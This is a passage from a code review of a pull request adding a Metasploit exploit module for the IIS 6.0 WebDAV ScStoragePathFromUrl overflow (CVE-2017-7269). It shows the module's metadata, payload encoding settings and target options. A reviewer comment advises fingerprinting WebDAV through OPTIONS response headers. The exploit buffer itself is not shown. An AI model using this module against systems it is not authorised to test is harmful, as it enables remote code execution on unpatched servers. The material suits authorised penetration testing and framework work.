modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb

```diff
@@ -0,0 +1,111 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => ' Microsoft IIS WebDav ScStoragePathFromUrl Overflow',
+      'Description'    => %q{
+          Buffer overflow in the ScStoragePathFromUrl function
+          in the WebDAV service in Internet Information Services (IIS) 6.0
+          in Microsoft Windows Server 2003 R2 allows remote attackers to
+          execute arbitrary code via a long header beginning with
+          "If: <http://" in a PROPFIND request, as exploited in the
+          wild in July or August 2016.
+
+          Original exploit by Zhiniang Peng and Chen Wu.
+      },
+      'Author'         =>
+        [
+        'Dominic Chell <dominic@mdsec.co.uk>', # Ported to metasploit
+        'Zhiniang Peng', # Original author
+        'Chen Wu',       # Original author
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2017-7269'],
+          [ 'BID', '97127'],
+          [ 'URL', 'https://github.com/edwardz246003/IIS_exploit'],
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'       => 2000,
+          'BadChars'    => "\x00",
+          'EncoderType'   => Msf::Encoder::Type::AlphanumUnicodeMixed,
+          'DisableNops'  =>  'True',
+          'EncoderOptions' =>
+            {
+              'BufferRegister' => 'ESI',
+            }
+        },
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process',
+          'PrependMigrate' => true,
+        },
+      'Targets'        =>
+        [
+          [
+            'Microsoft Windows Server 2003 R2 SP2',
+            {
+              'Platform' => 'win',
+            },
+          ],
+        ],
+      'Platform'       => 'win',
+      'DisclosureDate' => 'Mar 26 2017',
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        Opt::RPORT(80)
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi({ 'uri' => '/' })
```

Comment:
This should be an OPTIONS request checking the response headers for WebDAV related stuff like
```
MS-Author-Via: DAV
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
```